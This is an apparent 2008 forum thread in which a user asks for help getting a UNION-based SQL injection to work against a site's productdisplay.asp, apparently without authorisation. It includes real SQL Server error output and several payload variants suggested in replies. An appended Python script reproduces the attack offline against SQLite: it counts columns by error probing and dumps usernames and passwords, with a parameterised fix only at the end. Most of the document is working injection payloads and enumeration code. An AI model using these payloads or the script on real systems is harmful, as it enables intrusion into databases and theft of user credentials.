When testing SQL injection with this command:
?idProduct=-1+UNION+SELECT+1,2+FROM+users--
I am getting this error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'UNION'.
/productdisplay.asp, line 36
I have tried adding a quotation mark before UNION, but get another error message on unclosed quotation marks. What I think I should be aiming for is to get the "must have equal expression of target sites" error message. Can anyone help me out?
March 30th, 2008, 09:24 PM
oofki
Well I can tell you that I highly doubt they are using columns named 1 and 2. That's what you are telling it to do :-P
March 30th, 2008, 11:36 PM
shad0w7
Yeah, I know that, but I'm expecting to get the "must have equal number of expressions" error message. Then just add numbers 3,4,5.... until there's no error message. Then I'll substitute in column names after that.
March 31st, 2008, 12:43 AM
oofki
I'm saying what you are essentially doing is writing a query that says:
SELECT 1,2 FROM users
but it needs to look like:
Select ColumnNameA,ColumnNameB From Users where UserID = 1,2
March 31st, 2008, 02:10 PM
nebulus200
Not necessarily, the only thing that matters is that the # of columns matches and that the type is correct...
If I had to guess I'd say there is possibly an issue with a quote somewhere...the other thing that looks odd is the negative product number...are you sure that isn't wigging it out?
March 31st, 2008, 02:43 PM
shad0w7
Yeah, I just added the -1 because I've noticed in the past that it normally works, but I tried without the negative and it's the same error.
March 31st, 2008, 02:50 PM
nebulus200
My best guess would be something to the effect of:
Since it is choking on the union, my thought is it has to be something with the argument to idProduct and how the script is enclosing it in the subsequent SQL query...
March 31st, 2008, 05:21 PM
shad0w7
OK, with this injection:
1'+UNION+SELECT+(1,2)+FROM+users--
I get:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ' UNION SELECT (1,2) FROM users--'.
/productdisplay.asp, line 36
and with this: 1''+UNION+SELECT+(1,2)+FROM+users--
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near ''.
/productdisplay.asp, line 36
March 31st, 2008, 05:47 PM
nebulus200
What does:
'+UNION+SELECT+(1,2)+FROM+users--
''+UNION+SELECT+(1,2)+FROM+users--
return? Note: no numeric argument there and the second is two '
or
1+UNION+SELECT+1,2+FROM+users/*
or
1/**/UNION/**/SELECT/**/1,2/**/FROM/**/users/*
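The two questions running through this thread are (a) how the column count gets found by adding placeholders to the UNION until the error goes away, and (b) why the same payload behaves so differently depending on whether productdisplay.asp wraps idProduct in quotes or not. The script below is an added example, not code from the thread or from the site being tested: it rebuilds a concatenated query in Python against an in-memory SQLite database that stands in for SQL Server, so it runs offline. The products/users tables, their rows, and the three-column SELECT are invented for the demo; SQL Server's error wording ("equal number of expressions in their target lists", "Unclosed quotation mark") differs from SQLite's, but the error/no-error pattern the enumeration relies on is the same. It also tries the /**/-for-space variant suggested in the last post, and ends with the parameterised query that makes the whole payload inert.

```python
import sqlite3

# Constructed stand-in schema (assumption: the real productdisplay.asp tables
# are unknown, so these two tables and their rows are invented for the demo).
SCHEMA = """
CREATE TABLE products (idProduct INTEGER, name TEXT, price REAL);
INSERT INTO products VALUES (1, 'Widget', 9.99), (2, 'Gadget', 19.99);
CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
INSERT INTO users VALUES (1, 'admin', 's3cret'), (2, 'bob', 'hunter2');
"""

# Three columns in the page's own SELECT; the attacker has to discover that.
BASE = "SELECT name, price, idProduct FROM products WHERE idProduct = "


def connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_query(conn, id_product, quoted):
    """Splice the parameter into the SQL by concatenation, classic-ASP style.

    quoted=False mimics  WHERE idProduct = <value>
    quoted=True  mimics  WHERE idProduct = '<value>'
    The tester cannot see which form the page uses, which is the whole puzzle.
    """
    sql = BASE + ("'" + id_product + "'" if quoted else id_product)
    return conn.execute(sql).fetchall()


def union_payload(ncols, quoted, select_list=None, sep=" "):
    """-1 UNION SELECT 1,2,...,n FROM users--  (closing the quote when needed).

    sep lets you swap spaces for /**/ comments, as suggested in the thread.
    """
    cols = select_list or ",".join(str(i) for i in range(1, ncols + 1))
    close = "'" if quoted else ""
    return "-1" + close + sep.join(["", "UNION", "SELECT", cols, "FROM", "users--"])


def probe(conn, payload, quoted):
    """Run one payload; return ('ok', rows) or ('error', message)."""
    try:
        return "ok", vulnerable_query(conn, payload, quoted)
    except sqlite3.OperationalError as exc:
        return "error", str(exc)


def enumerate_columns(conn, quoted, max_cols=10, sep=" "):
    """Grow the SELECT list one column at a time until the UNION stops erroring.

    SQL Server reports the mismatch as 'must have an equal number of
    expressions in their target lists'; SQLite words it differently, but the
    first n that returns without error is the column count either way.
    """
    for n in range(1, max_cols + 1):
        status, _ = probe(conn, union_payload(n, quoted, sep=sep), quoted)
        if status == "ok":
            return n
    return None


def dump_users(conn, quoted):
    """Once n is known, replace two placeholders with real column names."""
    ncols = enumerate_columns(conn, quoted)
    if ncols is None or ncols < 2:
        return []
    filler = [str(i) for i in range(3, ncols + 1)]
    select_list = ",".join(["username", "password"] + filler)
    _, rows = probe(conn, union_payload(ncols, quoted, select_list), quoted)
    # idProduct = -1 matches no product, so every row comes from users.
    return sorted((row[0], row[1]) for row in rows)


def safe_query(conn, id_product):
    """Hardened form: bind the parameter, so the payload is only ever a value."""
    return conn.execute(BASE + "?", (id_product,)).fetchall()


if __name__ == "__main__":
    db = connect()
    for quoted in (False, True):
        print("quoted context" if quoted else "numeric context",
              "-> columns:", enumerate_columns(db, quoted),
              "users:", dump_users(db, quoted))
    # Unquoted payload into a quoted context: no error, just an empty result,
    # because the whole thing became a string literal.
    print("wrong quoting guess:", probe(db, union_payload(3, False), True))
    print("parameterised:", safe_query(db, union_payload(3, False)))
```

Running it shows the two failure modes from the thread side by side: a quoted payload in a numeric context trips a syntax error at the stray quote, while an unquoted payload in a quoted context produces no error at all and simply returns nothing, which is why neither result on its own tells you the column count. Only once the quoting guess matches does the count-until-no-error loop start giving usable feedback.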